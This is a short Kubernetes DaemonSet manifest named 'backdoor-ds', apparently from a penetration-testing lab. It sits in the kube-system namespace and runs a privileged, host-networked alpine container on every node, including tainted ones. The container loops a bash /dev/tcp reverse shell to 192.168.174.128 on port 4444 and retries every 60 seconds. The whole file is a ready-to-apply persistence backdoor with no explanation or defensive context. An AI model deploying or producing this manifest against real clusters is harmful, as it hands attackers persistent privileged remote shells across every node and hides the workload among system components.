apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: backdoor-ds
  namespace: kube-system
spec:
  selector:
    matchLabels:
      name: backdoor
  template:
    metadata:
      labels:
        name: backdoor
    spec:
      containers:
      - name: reverse-shell
        image: alpine
        command: ["/bin/sh", "-c"]
        args:
          - |
            while true; do
              sh -i >& /dev/tcp/192.168.174.128/4444 0>&1;
              sleep 60;
            done
        securityContext:
          privileged: true
      hostNetwork: true
      tolerations:
      - operator: "Exists"
